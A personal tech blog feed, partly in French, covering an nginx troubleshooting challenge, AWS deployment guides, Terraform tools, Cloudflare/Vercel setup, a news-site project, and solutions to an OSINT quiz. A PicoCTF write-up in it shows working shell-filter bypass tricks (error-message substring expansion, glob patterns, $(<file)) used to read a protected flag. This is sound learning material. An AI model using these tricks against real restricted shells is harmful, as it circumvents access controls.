At first I thought that was it. But the challenge wasn't done yet. curl http://localhost/1 was now returning a 502 - Bad Gateway.

We have something else that we need to fix. Let's look at the nginx config. It's on the host at app/default.conf. It's been mounted in the nginx container:

cat app/default.conf
    server {
        listen 80;
        location / {
            root   /usr/share/nginx/html;
            index  index.html index.htm;
        }
        location /1 {
            rewrite ^ / break;
            proxy_pass http://statichtml1.sadservers.local;
            proxy_connect_timeout   2s;
            proxy_send_timeout      2s;
            proxy_read_timeout      2s;
        }
        location /2 {
            rewrite ^ / break;
            proxy_pass http://statichtml2.sadservers.local;
            proxy_connect_timeout   2s;
            proxy_send_timeout      2s;
            proxy_read_timeout      2s;
        }
    }

Did you notice it? The statichtml containers are exposing the port 3000, but this config is using the default HTTP port (80). We have a second issue to fix here!

We need to specify the port 3000 for the proxy redirection to work:

proxy_pass http://statichtml1.sadservers.local:3000;

Lastly, for the config change to apply, we restart the container with docker restart 7440094fc321.

Did it work?

curl -v http://localhost/1
[...]
< HTTP/1.1 200 OK
< Server: nginx/1.29.3
< Date: Sun, 07 Dec 2025 23:28:07 GMT
< Content-Type: text/html
< Content-Length: 13
< Connection: keep-alive
< Accept-Ranges: bytes
< Last-Modified: Thu, 30 Oct 2025 20:33:09 GMT
< ETag: "6903cb85-d"
<
HelloWorld;1
* Connection #0 to host localhost left intact

It sure did! 🚩

Terraform/terragrunt tools

2024-11-06T00:00:00Z

tfsec - Static analysis security scanner for Terraform code
Checkov - Static code analysis tool for infrastructure-as-code
KICS (Keeping Infrastructure as Code Secure) - Security vulnerability scanning and compliance testing
Terrascan - Static code analyzer for Infrastructure as Code
tflint - Terraform linter focused on possible errors and best practices
Terratest - Testing infrastructure code
terraform-compliance - Compliance as code framework
config-lint - Rules-based configuration validation
Infracost - Shows cloud cost estimates for Terraform
Terragrunt - Thin wrapper for Terraform that provides extra tools
Atlantis - Terraform pull request automation
driftctl - Infrastructure drift detection tool
OTS (Open Terraforming Server) - Open source alternative to Terraform Enterprise
Terraformer - Infrastructure to code tool (reverse Terraform)
CDK for Terraform - Cloud Development Kit for Terraform
Former2 - Generates Terraform/CloudFormation/Troposphere configurations from existing AWS resources
cf2tf - CloudFormation to Terraform converter
cf-to-tf - CloudFormation to Terraform converter
specctl - Kubernetes to ECS converter
hcl2json - HCL to JSON converter
terraform-docs - Documentation generator for Terraform modules
Brainboard - Visual infrastructure builder and Terraform code generator
AirIAM - AWS IAM least privilege Terraform framework
Pike - IAM policy analysis tool
Terraform AWS Secure Baseline - AWS account secure baseline configuration
Terragrunt example infrastructure - Example implementation of Terragrunt
yor - Automated infrastructure tagging tool
tfmigrator CLI - Terraform configuration and state migration tool
tfgen - Terraform monorepo management tool
tfquery - SQL queries for Terraform infrastructure
tfnotify - Terraform execution notification tool
Conftest/Confectionery - Policy testing against configurations

Bash with no letters

2024-10-10T00:00:00Z

I recently did a challenge on PicoCTF (U2Fuc0FscGhhCg 🐶) and I had to explore some bash trickery to solve it. I learned a few tricks that are worth noting here for future me or future you.

The challenge starts in a limited shell in which you can only enter numbers and some special characters.

$ ls
Unknown character detected
$ \l\s
Unknown character detected
$ \\l\\s
Unknown character detected

Excluded characters were: a-zA-Z\

Got to find a way to enter letters without using letters! Or so I thought.

Substring expansion

My first idea was to capture any error message into a variable and to use that to get the letters I needed.

Once I got l and s, I could capture the output of ls and then cat the flag file.

$ /_
bash: /_: No such file or directory

# capture the error message with redirection of stderr into stdout
_1=$( /_ 2>&1 )
# excellent! we now have access to an l and an s
# index 0 is `b`, index 1 is `a`, and so on

# ls
${_1:20:1}${_1:2:1}
folder    on-celestran.txt

# capture output of ls to reference the folder name
_3=$(${_1:20:1}${_1:2:1} 2>&1)

# ls folder
${_1:20:1}${_1:2:1} ${_3:0:6}
flag.txt  on-elphe-9.txt

# capture output of ls folder
_4=$(${_1:20:1}${_1:2:1} ${_3:0:6} 2>&1)

# cat folder/flag.txt
${_1:30:1}${_1:1:1}${_1:31:1} ${_3:0:6}/${_4:0:8}
return 0 [redacted-flag]

That's very ugly to say the least. But I got the flag anyway! 🚩

That was the long way, though. Turns out there was a very simple way to get the flag. Not sure why I didn't think of it earlier!

Path expansion, wildcards & pattern matching

Pattern matching in the bash manual

Using only * and ?, we can list files in directories or call some binaries.

$ /***/****[64]
/bin/base64: extra operand ‘/bin/col6’
Try '/bin/base64 --help' for more information.

To make this work, we would need something more specific since we're matching more than one binary. But it could work.

An even easier way is to use only path expansion and wildcards.

I noticed ~ was working as expected:

$ ~/
bash: /home/ctf-player/: Is a directory

$ ~/*
bash: /home/ctf-player/folder: Is a directory

$ ~/??????/*
bash: /home/ctf-player/folder/flag.txt: Permission denied

Now we know where the flag is located!

Subshell

The command substitution $(cat file) can be replaced by the equivalent but faster $(< file). Source

Turns out we don't even need letters!

Reading the flag is as simple as sending the path pattern as an input redirect in the subshell. Since there's the return 0 string at the beginning of the flag file, we need to quote the command substitution to get the whole string.

$ "$(<~/*/????.???)"
bash: return 0 [redacted-flag]: command not found

There you have it, folks, that's bash in all its beauty! 😅

Zsh function to assume a role in AWS

2023-06-14T00:00:00Z

Note

The Granted CLI added the --chain flag a few months after publishing this, offering a cleaner solution to what I was doing with this script.

Working in AWS, I sometimes need to test a role to debug some issues or validate some hypotheses.

I'm already using the Granted CLI to assume federated roles in the AWS accounts I have access to, but it doesn't let me quickly change role (either in the same AWS account or in another one).

I wrote a small Zsh function to make this possible.

Prerequisites

AWS CLI installed
Granted CLI app installed and set up
A directory to store your Zsh functions (in my case, ~/.zfunctions)
.zshrc configured to autoload functions from that directory

Autoload functions in `.zshrc`

Add these lines inside your .zshrc:

fpath=(~/.zfunctions $fpath) autoload -Uz ${fpath[1]}/*(:t)

Zsh function: `role-assume`

Write the following to the file ~/.zfunctions/role-assume

#!/usr/bin/env zsh

role-assume() {
  if [[ -z "$1" ]]; then
    echo "Usage: role-assume <role-arn>"
    echo "Example: role-assume \"arn:aws:iam::123456789000:role/role-name\""
    exit 1
  fi

  local out
  if ! out=$(aws sts assume-role --role-arn "$1" --role-session-name assume-role-local-func --output json); then
    echo "Failed to assume role" >&2
    exit 1
  fi

  export AWS_ACCESS_KEY_ID=$(echo "$out" | jq -r '.Credentials.AccessKeyId')
  export AWS_SECRET_ACCESS_KEY=$(echo "$out" | jq -r '.Credentials.SecretAccessKey')
  export AWS_SESSION_TOKEN=$(echo "$out" | jq -r '.Credentials.SessionToken')

  echo "Trying 'aws sts get-caller-identity'"
  aws sts get-caller-identity | jq -r '.UserId'
}

Testing

Open a new shell. You should now be able to assume a role by passing the ARN to the function.

# use granted `assume` cli app to get the initial credentials

assume account-role-x

# [✔] [account-role-x](ca-central-1) session credentials will expire in 8 hours

# call the function with a role ARN

role-assume arn:aws:iam::role-y-other-account

Trying 'aws sts get-caller-identity'
ABCDREEEEWWWWKBKB:role-y-other-account

The function is outputting the userId returned by aws sts get-caller-identity to confirm that we now have the new credentials.

Obviously, the trust policy in the role you want to assume must allow the initial role/user to perform sts:AssumeRole. Such as:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::111122223333:role/account-role-x"
      },
      "Action": "sts:AssumeRole"
    }
  ]
}

Basic CI/CD pipeline with AWS S3, 11ty and GitHub Actions

2022-08-25T00:00:00Z

As a DevOps learning project, I've decided to host a copy of this website on AWS using S3 and CloudFront services. From the current process that's using Vercel as a build/deploy tool, I'm now trying the manual way to learn the intricacies of it all: GitHub Actions, CloudFront and S3. The first step is to do it with the AWS web management console, and then to use Terraform and IaC to put this in place.

As you may know, this website is built using Eleventy, a static site generator. I build the website locally, and push it to GitHub in a private repository. Currently, I use Vercel to build and deploy the website automatically on each push to the main branch. Each changes then goes live and is available at https://jrb.nz in the following minutes.

The goal here is to manually do the part that Vercel does for me: host the website in a AWS S3 bucket, automate the build/deploy pipeline with GitHub Actions, and add CloudFront as the CDN on top of it.

I'll explain how to proceed with the AWS Management Console, and then (eventually) link to the IaC Terraform files at the end.

Create a S3 bucket for webhosting

Log into the AWS Management Console, and navigate to the S3 section
Click on the button Create bucket
Choose the region in which you want your bucket (I'm using us-east-2 to stay in the Free Tier)
Untick Block all public access: we want the files inside the bucket to be available to anyone on the web
Acknowledge that you know the risks by ticking the following checkbox
Leave the remaining settings as is, and click Create bucket

The bucket is now created. Click on it to modify some properties:

Click your bucket name in the list
Go over the Properties tab
Scroll all the way down to the Static website hosting section
Click Edit, and choose Enable for Static website hosting
Define the Index document, in my case index.html
Save the changes
Note your bucket website endpoint : that'll be the URL for our site!

Now we need to define the Bucket policy! Switch to the Permissions tab:

Click on Permissions tab
Scroll to the Bucket policy section
Click Edit, then enter the following JSON policy:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "PublicReadGetObject",
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::YOUR-BUCKET-NAME-HERE/*"
        }
    ]
}

Replace YOUR-BUCKET-NAME-HERE by your current bucket name
Be aware that this policy makes EVERYTHING public inside your bucket. You might want to use something more strict!
And save the changes

That's it, the bucket is ready to be used as for website hosting.

Create the IAM policies and user

Following best practices in security is always a good idea. For this reason, we'll create a new user that'll be used only for this project, and only with the minimal required permissions/policies.

Here's what we need to give permissions for:

Send and delete data inside the S3 bucket
Send invalidation request for CloudFront (to make sure we are serving the most recent version of the site after pushing changes)

Create the policies

Go into the AWS IAM section
On the left, choose Policies
Then click Create policy
Use the following JSON for the S3 policy:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:PutObject",
                "s3:GetObject",
                "s3:ListBucket",
                "s3:DeleteObject",
                "s3:GetBucketLocation"
            ],
            "Resource": [
                "arn:aws:s3:::YOUR-BUCKET-NAME-HERE",
                "arn:aws:s3:::YOUR-BUCKET-NAME-HERE/*"
            ]
        }
    ]
}

Click Next: Tags, then Next: Review, then give it a good name and click Create Policy.
Next, we need to create a second policy for the cache invalidation in CloudFront. Do the same as before, but with the following JSON:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "cloudfront:ListInvalidations",
                "cloudfront:GetInvalidation",
                "cloudfront:CreateInvalidation"
            ],
            "Resource": "arn:aws:cloudfront::CLOUDFRONT-ID:distribution/*"
        }
    ]
}

Replace CLOUDFRONT-ID with your unique CloudFront distribution ID (you can find it in the ARN.
Give a name to your policy and Create it!

Create a new user

Go into the AWS IAM section
On the left, choose Users
Then click Add users
Give it a good name, and choose Access key as the credential type.
Go into the Attach existing policies directly tab
Choose the two policies we just created (first one for S3 access, then the CloudFront one)
Click Next: Tags, then Next: Review, and Create the user.
Don't forget to save the credentials! We need them in the next steps.

Add GitHub repository secrets

Head to your GitHub repository, and go into the Settings.

On the left, under Security, click Secrets, then Actions
Create four new secrets for each of these:
- AWS_ACCESS_KEY_ID
- AWS_SECRET_ACCESS_KEY
- CLOUDFRONT_ID
- S3_BUCKET

This way, the AWS credentials won't be exposed in your GitHub Actions file, neither will your CloudFront distribution ID or the name of your S3 bucket.

GitHub Actions

In your GitHub repo, go into the Actions tab. Click New Workflow and add the following:

name: Build and Deploy to S3
on: [push]
jobs:
  build_and_deploy:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repository
        uses: actions/checkout@v2.3.4

      # Uncomment if you want to specify a certain
      # Node version. Otherwise the Node version installed
      # on the GitHub VM will be used. For more details
      # see: https://github.com/actions/virtual-environments
      # - name: Setup Node.js environment
      #   uses: actions/setup-node@v2.1.4
      #   with:
      #     node-version: '15.7.0'

      - name: Install dependencies
        run: npm ci

      - name: Build the website
        run: npx @11ty/eleventy

      - name: Configure AWS Credentials
        uses: aws-actions/configure-aws-credentials@v1
        with:
          aws-access-key-id: $
          aws-secret-access-key: $
          aws-region: us-east-2 # replace this with your aws-region

      - name: Upload files to S3 with AWS CLI
        run: |
          aws s3 sync public/ s3://$ --delete

      - name: Invalidate CloudFront cache for all paths
        run: |
          aws cloudfront create-invalidation --distribution-id $ --paths "/*"

That's it for the GitHub Action! The workflow should run after commiting the main.yml file. If all went well, you should have your site up at your S3 URL saved earlier! Check the logs to make sure there's no errors.

CloudFront

The last step is to add CloudFront as the CDN on top of the S3 bucket. For this, I'm using a cheap domain I had laying around. You can do it without a domain, the CloudFront default URL can be used for learning purpose.

Create distribution

Go into the AWS CloudFront section, and click Create distribution
As the Origin domain, you need to enter your S3 URL (without the http/https)
All the other default parameters work for us, leave them as is.
Click Create Distribution, and wait for it to be created in AWS.

You could stop here if you wanted. Using the CloudFront default domain name, you can then have access to your site! But I wanted to go a step further and a my own domain name.

Request a certificate for your domain

To proceed here, you need your own domain. You can get some cheap ones if you want.

Go into the AWS Certificate Manager section
Click Request to start a new request
Choose Request a public certificate, then click Next
Enter your domain name in the field for it, then choose DNS validation
Click Request at the end

To validate that you're the owner of the domain, you need to add a CNAME record. AWS will give you a Name and a Value that you enter in the record. Create the record, and wait a minute. AWS should then issue your certificate!

Define alternative domain for CloudFront distribution

Back into the CloudFront section, choose your distribution
In the Settings section, click Edit to add the alternative domain
Enter the alternate domain, and choose the certificate that was just issued
Save the changes

Add CNAME record

Finally, we add the CNAME record linking our domain to the CloudFront distribution. CNAME @ YOUR-CLOUDFRONT-URL

Next steps ?

Using the AWS web management console is only half the job: I want to do this using IaC. I would also like to create some type of logging, maybe add a dashboard for it.

Final word

That's it! I now have a live copy of this website on AWS S3. When I commit changes to the repository, two builds will run in parallel:

Vercel will build and deploy
GitHub Actions will trigger a build and deploy to S3, and the CloudFront cache will be refreshed

To complete this, I had some help from the following:

The initial idea came from this Reddit comment.

Two days later edit (08/27)

I noticed that my initial S3+CloudFront setup was allowing requests to be sent directly to the S3 bucket website endpoint, which isn't something you want when using caching through CDN such as CloudFront. I found a way to change this so that only the CloudFront URL can be used (or its alternate domain name).

A couple of things were modified to make it work:

Static web hosting has to be activated on the S3 bucket, but I also had to block all public access
I created a CloudFront Origin access identity (legacy), that is then used inside the bucket policy to allow access (and it's assigned inside the CloudFront distribution)
The Object Ownership is Bucket owner enforced in the S3 bucket
Added a CORS configuration allowing GET requests on all origins
And finally added a CloudFront function that appends index.html at the end of URL that don't have it (filenames within directories are hidden with Eleventy)

OSINT quiz 2020 - Sector035

2022-03-10T00:00:00Z

J'explore la communauté OSINT depuis quelques années. J'ai (re)découvert les quiz de @Sector035 cette année, et j'ai décidé de compléter l'édition de 2020. Voir ce tweet pour le contexte.

J'avais déjà commencé l'édition précédente (osintquiz [at] gmail.com). J'ai le souvenir que les questions étaient particulièrement difficiles. Cette nouvelle édition 2020 est vraiment plus simple et permet de faire un survol de plusieurs des outils de bases à la recherche OSINT.

Spoiler alert! Je donne pratiquement toutes les réponses au quiz de 2020 ci-dessous! Si vous voulez participer, je vous conseille de ne pas trop lire attentivement ;)

Qu'est-ce que c'est?

Un peu comme dans un escape game, les quiz OSINT demandent de trouver une solution à une question pour passer au niveau suivant. On procède en récupérant des indices et en fouillant sur le web. Les questions concernent de l'information publiquement accessible sur Internet, mais demandent aussi un peu de réflexion et d'analyse.

Comment participer ?

La procédure pour participer est très simple:

How to start the 2020 OSINT Quiz? Just write an email to: osintquiz2020 [at] gmail.com

The subject should say "start" and nothing else

Be patient, the instructions should come in within a minute

Read the email and make sure you understand how to send in the answer

On reçoit ensuite les instructions et questions du quiz par courriel. Pour passer au niveau suivant, il faut envoyer la réponse en hash MD5 dans l'objet d'un nouveau courriel.

Si le hash MD5 envoyé correspond à la bonne réponse, on reçoit automatiquement les instructions pour le niveau suivant.

start

On March 28, 2018 I (sector035) sent out a tweet, quoting a geolocation challenge by someone else. But what is the display name of the Twitter account that sent out this quiz?

Une recherche Google (March 28, 2018 sector035) permet de trouver rapidement le Tweet en question. Le display name du compte qui a posté le challenge est Rickey Gevers.

01

Julia Bayer started the whole Quiztime geolocation movement back in 2017. She started out with the hashtag #MondayQuiz. But can you tell me what the last text was that she tweeted in 2017, while using the hashtag #MondayQuiz? Only take the text. No unicode characters, emoticons, hashtags or anything else.

Recherche sur Twitter qui permet de trouver le dernier tweet de 2017: from:bayer_julia #MondayQuiz until:2017-12-31

02

Quiztime crew member @twone2 posted an image on Instagram on November 24, 2018. In the URL you see the unique identifier of the post (called a 'shortcode' by Instagram), which consists of a bunch of lowercase and uppercase letters and numbers. But there is also an 'id', which can be found in the source or JSON output. This one only contains numbers. Can you find this number?

La publication en question: https://www.instagram.com/p/Bqj00zHAsgK/

Avec l'URL suivant, on peut récupérer les infos de la publication: https://api.instagram.com/oembed/?url=http://www.instagram.com/p/Bqj00zHAsgK/

La réponse n'est pas le media_id complet, mais seulement la première partie (avant _).

03

In September 2019 someone posted in an aviation forum a quote that explained how Christiaan Triebert has used shadows, that were cast by towers around a launch pad, as sun dials. What is the username of the account that posted this? When you found the name, make sure it's all in lower case, calculate the MD5 hash and send it in.

Une recherche Google permet de trouver facilement la réponse: aviation forum "Christiaan Triebert" sept 2019 sun dials

04

A little Dutch touch in this question. There's a weird artwork in Indianapolis that has its own Wikipedia entry here: https://en.wikipedia.org/wiki/Funky_Bones The photo on the Wikipedia page can be found all over the internet, but one of the oldest uploads out there is a stock photo site. Are you able to find this stock photo? Then grab the original filename and calculate the MD5 hash. No need to convert anything to lower case, just calculate the MD5 hash of this exact filename that you found on the stock photo website.

Ce challenge m'a demandé un peu plus de temps (la question me semblait drôlement formulée). Une recherche d'image inversée sur Yandex m'a permis de trouver l'upload sur Gettyimage.

Il fallait ensuite déterminer quelle métadonnée correspondait au "original filename", avec ou sans l'extension de fichier. J'ai fini par trouver ;)

05

For this question I'm going to feature the awesome Dutch OSINT Guy Nico. And we'll be looking at YouTube videos, and some online tools that are designed for them. Using a tool that can investigate YouTube content, can you tell me what the exact timestamp of the following video is? Link to the video: https://www.youtube.com/watch?v=kUVFeXSdkO8 Extract the exact date and time from the timestamp of the video, and convert it as follows: yyyymmddhhmmss Then calculate the MD5 hash and send it in.

Très facile avec cet outil: https://mattw.io/youtube-metadata/

06

Time to have a crack at the following image: https://drive.google.com/file/d/1ZhwLFYh2bYD4EhrB5_Lzj1WToovC_psB/view Provide the name of the person who initially uploaded it to a 'wiki' platform. I want the full name, so the first and last name, all in lowercase and no spaces. Then calculate the MD5 hash and send in your answer.

Une recherche dans Yandex sort rapidement le résultat sur le domaine wiki2.org.

07

It's been some time since that https://osintcurio.us was launched, and somewhere in December 2018 someone posted the link to this website for the first time on a Reddit subforum. Find the forum, find the post, and then exact the timestamp of this post. If you're logged in at Reddit, you can find it in the following format: yyyy-mm-ddThh:mm:ss+00:00 Don't change anything! This time you don't convert to lower case or anything, just grab that timestamp and calculate the MD5 hash! But whether you are logged in or not, somewhere in the page the date and time of the post is also visible as a Unix timestamp. Never heard of that? Read about it over here. Just dive into the page, find the timestamp, convert it to MD5 and send in your answer!

Une recherche Google permet de trouver la publication sur Reddit en 2018: osintcurio.us reddit 2018.

En ajoutant about.json à la fin de l'URL, on obtient les données associées à la publication en JSON. La réponse est en Unix timestamp.

08

For this question, we'll be looking at a scan of the website https://osintcurio.us that was performed by urlscan.io in early 2019. Open the following link and click around to have a look at all the information that is stored. But the question can only be answered by opening up the JSON output and have a good look at how much more information is in there, compared to the web interface: https://urlscan.io/result/2d8a4cdb-6c43-4925-a9f9-d99750cf3f8b/ When this scan was made, the webserver sent out slightly different headers than it does nowadays. Please provide the exact text that was sent in the "X-Hacker" header.

Visiter l'URL et aller à la section API permet de trouver la réponse.

09

For this question, we'll be looking at some more JSON output, just to give you some extra practice. You'll only your browser and the developer tools again, like last time. Open the following site, and answer the question: http://www.virtualradar.nl/virtualradar/desktop.html By looking at the traffic between your browser and the website, and looking at the JSON, can you deduct the name of the variable that shows the total amount of airplanes currently tracked within the view you've selected?

En analysant les requêtes, on peut voir dans AircraftList.json que la variable totalAc semble être utilisée pour le nombre total des avions.

10

Fiete Stegers tweeted a photo from his new workplace some time ago, as a Quiztime geolocation challenge. Nowadays a lot of social media remove most metadata of images or videos, but especially when you download something from a website, it sometimes pays off to check the metadata or EXIF information in a file. With the photo given here, it should be possible to find out exactly where this building is. The photo was placed inside a ZIP file, since Google Drive actually strips certain EXIF information, which would break this quiz: https://drive.google.com/file/d/1bbic7xP7nM0drsICb7e4bm1zkDTbSAF4/view To answer the question: Don't bother geolocating the building itself, that would be too easy. Simply find the GPS coordinates, and calculate the MD5 hash, after you wrote the coordinates in the following format: latitude,longitude

Après avoir téléchargé le fichier, on peut extraire les métadonnées avec exiftool:

exiftool hamburg.jpg ... GPS Latitude : 53 deg 33' 23.91" GPS Longitude : 10 deg 1' 19.48"

Pour convertir en degrés décimaux: https://www.latlong.net/degrees-minutes-seconds-to-decimal-degrees

53.5566,10.0220

11

One of the Quiztime crew members is Philipp Dudek, and he works for HHLab. It's time to look at his profile photo on the website. But... Are you able to find out who the person is that probably edited his photo? Calculate the name after you converted it to lowercase!

Je télécharge la photo et analyse les métadonnées:

exiftool Philipp.png

Dans le champ History, on peut voir qu'un certain Marc a travaillé sur le fichier: C:\Users\Marc\AppData\Roaming\Adobe\Adobe Photoshop CC

12

Time to dive one more time into the EXIF data with an easy question... Open the following site and extract the EXIF information from the image of the typewriter. You might not be able to download this image right away, so you could use the developer tools to find the direct URL to download it. Go have a look at the abundance of information inside the EXIF data: https://www.behance.net/gallery/11820853/Type-Investigation The answer is the "Legacy IPTC Digest". And even though it's a hash, just convert the value you've found to an MD5 hash, that's your answer.

On peut télécharger l'image en allant dans les outils de développement, onglet Network, filtrer par images pour récupérer le fichier original.

Comme pour les deux niveaux précédents, exiftool permet d'extraire la réponse et de trouver le Legacy IPTC Digest.

13

The website of the OSINT Curious Project (link http://osintcurio.us/) was launched end of 2018. Back in the early days, inside the "robots.txt" that you can find in the root (or top folder) of most webservers, there was a date mentioned. Time for you to dive into history and find this exact date! Grab the date and time mentioned in that file, and create the MD5 hash of the following format: yyyymmddhhmmss

Avec la Wayback Machine, on peut retrouver le fichier robots.txt original: https://web.archive.org/web/20181214143755/http://osintcurio.us/robots.txt

14

Marco Bereth is one of the people that sends out quizzes for the Quiztime Twitter account. Back in 2013 his Twitter bio was quite different than today. But what was the very first word in his profile back in July 2013? Grab that word, convert it to lower case, and calculate the MD5 hash!

Avec https://archive.is ou https://web.archive.org, on peut retrouver la bio du compte en 2013.

15

Using the website Elephind, you'll be searching for articles that are mentioning the term "OSINT" or "open source intelligence" in any of the indexed newspapers. Using Elephind, try to find a newspaper from October 29, 2007. The term is mentioned in a calendar of some kind, on page 2 of that particular newspaper. Find that calendar item and find the name of the person that is mentioned. Strip the spaces in that name, convert it to lower case, and calculate the MD5 hash.

Une recherche sur Elephind permet de trouver l'édition du journal en question. La réponse est à la page 2, dans la section du calendrier.

16

This statue can be found somewhere in the world, and even has his own 'square'. Are you able to find out where this statue is, and find the name of the 'square' it can be found? https://drive.google.com/file/d/1W8jhuubkP2-E2Ike2MsedPQfxdNYxpgg/view Grab the name of the 'square' (in its original language), convert it to lower space and remove anything that isn't a letter. No dashes, spaces, or such. Calculate the MD5 and send in the answer.

Cette dernière question m'a donné du fil à retordre. La photo contient deux indices intéressants que j'ai tenté d'explorer pour trouver la solution:

Le véhicule sur la photo est un camion de pompier (et non pas une ambulance comme j'ai d'abord cru). La mention Feuerwehr, pompiers en allemand, le confirme.
La place où se trouve la statue est bordée d'escaliers ou de passages piétonniers (derrière le camion de pompiers).

C'est plutôt une recherche par images sur Yandex qui m'a permis d'avancer. J'ai repéré une photo de la même statue - on reconnait l'arrière de la tête, et le passage piétonniers en face (ici sur Flickr). La description de la photo contient le nom de la place à Düsseldorf.

Comment configurer Cloudflare avec Vercel

2022-02-11T00:00:00Z

Je fais la gestion DNS de mes projets sur Cloudflare. J'ai eu quelques pépins techniques en configurant mes noms de domaine avec des projets hébergés chez Vercel. Je recevais quotidiennement des courriels de Vercel me signalant que la configuration DNS de mes projets était incorrecte. Je me suis penché sur le problème pour tenter de trouver une solution.

Vercel annonce d'emblée dans sa documentation qu'ils ne recommandent pas l'utilisation du proxy Cloudflare:

It is highly recommended that you don't use the Cloudflare CDN with Vercel. ^[1]

Si on veut quand même utiliser le proxy Cloudflare, Vercel indique qu'on doit permettre les requêtes HTTP (sans SSL) sur le path /.well-known/*.

Désactiver HTTPS pour `.well-known`

On peut désactiver le trafic HTTPS avec les Pages rules de Cloudflare:

Visiter Rules > Pages Rules
Create Page Rules
Dans le champ If the URL matches, entrer le domaine avec les wildcards nécessaires: *exemple.com/.well-known/*
Sélectionner SSL > Off

Forcer le trafic HTTPS

Il faut par ailleurs rediriger toutes les autres requêtes HTTP vers HTTPS manuellement avec une autre règle (même si Cloudflare a une option pour le faire automatiquement):

Visiter SSL/TLS > Edge Certificates
Désactiver Always Use HTTPS
Visiter Rules > Pages Rules
Create Page Rule
Dans le champ If the URL matches, entrer le domaine *domaine.com/*
Sélectionner Always Use HTTPS
Enregistrer, et mettre cette règle en 2e position

Tester la configuration

On peut confirmer que la nouvelle configuration fonctionne avec la commande suivante, qui devrait retourner un 404: curl http://example.com/.well-known/acme-challenge -I

L'interface de Vercel se met rapidement à jour quand la configuration est tip top 🎉

https://vercel.com/support/articles/using-cloudflare-with-vercel ↩︎

Projet: Radio-Canada Mini

2022-01-10T00:00:00Z

Important

Ce projet a reçu une notice de retrait DMCA en juin 2024. Je savais que ce projet était voué à se terminer ainsi. Malgré tout, les échanges et les apprentissages que le projet a générés ont valu la peine! Tous les URLs vers le site pointent maintenant vers la page archivée dans la Wayback Machine.

En 2021, j’ai découvert la version lite de CBC.ca, disponible à la page https://cbc.ca/lite. Je me suis lancé le défi de créer une version équivalente pour le contenu de Radio-Canada.ca.
Le projet est resté en ligne de 2021 à juin 2024 à l'adresse: https://radiocanadamini.ca
Cet article présente le projet et fait un survol de quelques détails techniques.

Pourquoi faire ce site?

L’objectif initial était d’apprendre à utiliser le générateur de site statique Eleventy tout en produisant un site utile et pertinent, autant pour moi que pour d’autres. Entre 2015 et 2017, j’avais exploré Hugo et Jekyll. Je voulais maintenant essayer quelque chose de nouveau.

L’expérience de navigation et de lecture sur Radio-Canada.ca me décevait depuis plusieurs mois, et j'avais envie d'améliorer les points suivants avec un site léger et minimaliste:

1. Omniprésence de la publicité: sans un bloqueur de publicités, Radio-Canada.ca est rempli de publicités (en images ou en vidéos). Les contenus publicitaires sont continuellement rechargés.

2. Lourdeur des pages: le chargement de toutes les images et de tous les modules d’une page sur Radio-Canada.ca peut prendre plusieurs secondes. La page d’accueil fait environ 3 Mb. 140 requêtes sont faites pendant le chargement.

3. Espace visuel surchargé: la lecture d’un texte ne se fait pas sans voir plusieurs fils de nouvelles divers, la liste des articles les plus lus, l’espace accordé aux commentaires, etc.

CBC Lite

En 2021, CBC lançait la version lite de son site. Voici comment le projet est présenté:

The internet is getting bigger, and with it, the amount of information sent for each web page load continues to increase exponentially. For those of us lucky enough to have high-speed internet access, we’ve now been opened up to the options of high-definition video and audio streaming. Pages can load large, complicated components, and data can zip back and forth at lightning speeds.
Unfortunately these kinds of advances tend to leave others behind.
More than a million users in Canada access CBC.ca on dial-up internet speeds each month. This often results in wait times of 30-plus seconds (up to multiple minutes) for a single page load. When you factor in video and audio streams, many pages quickly become inaccessible. Besides dial-up, CBC.ca has more than 10 million users each month visiting using cellular data, and the majority of users are not on unlimited data plans. Large page sizes quickly eat up data, leading to poor experiences.

Radio-Canada, de son côté, n'a jamais lancé de projet similaire. J'ai donc profité de l'occasion pour me lancer dans le projet de reproduire, en quelques semaines, un site équivalent.

D’ailleurs, plusieurs autres projets similaires existent ailleurs sur le web:

Version text-only de NPR
Version lite de CNN
Version skinny The Guardian

Quelle est la pertinence d’un site de ce genre en 2022?

Avec la montée fulgurante des nouvelles technologies du web et des réseaux sociaux, avec la centralisation excessive des services vers les GAFAM, on pourrait croire que des sites légers (qui consomment peu de données) tels que CBC Lite sont maintenant désuets, inutiles. Qu’ils seraient des artéfacts du web d’avant, du petit web.

Il faut par contre rappeler que l’accès à Internet est un privilège, tout autant que l’accès à une connexion Internet de qualité. Dans un rapport publié en 2019, le CAC constatait l’écart de connectivité à travers le Canada:

Seulement 46% des ménages ruraux (et 35% des ménages dans les réserves des Premières Nations) avaient accès à des connexions Internet qui répondaient aux critères du gouvernement du Canada (50/10 illimité).^[1]

Dans cette optique, ça devient pertinent — par souci d’accessibilité — d’offrir des sites légers, qui pourront s’afficher rapidement pour tous les ménages à connexion Internet réduite (ou dont la consommation en données est limitée).

Avantages

Outre les points déjà mentionnés, voici d'autres aspects qui donnent de la pertinence au projet:

Épuré: L’interface est volontairement minimaliste. Retour à l’essentiel. Le texte est mis de l’avant, les images sont facultatives.
Sans publicités: Aucune publicité n’est ajoutée au site. Radio-Canada Mini ne rapporte aucun revenu.
Respect de la vie privée: Aucun trackers, aucun cookies. Le site ne récupère aucune information sur votre navigateur et votre configuration. La seule métrique qui est utilisée est celle disponible via Cloudflare (les statistiques de requêtes DNS).
Faible consommation de données: La page d’accueil de Radio-Canada.ca fait 3200 kb (3.2 MB), alors que Radio-Canada Mini et la plupart de ses pages font moins de 20 kb. Environ 160 fois moins de données sont consommées en visitant Radio-Canada Mini.
Empreinte carbone réduite: Radio-Canada Mini a une empreinte carbone exemplaire (source: WebsiteCarbon.com).

Affiliation à CBC/Radio-Canada

Radio-Canada Mini est un projet indépendant. Il s’agit d’un projet personnel mis en ligne sans aucune intervention de la société d’État.

Aspects techniques

Quelques détails techniques sur le projet.

Le code source est publiquement accessible sur Github.

Structure des données

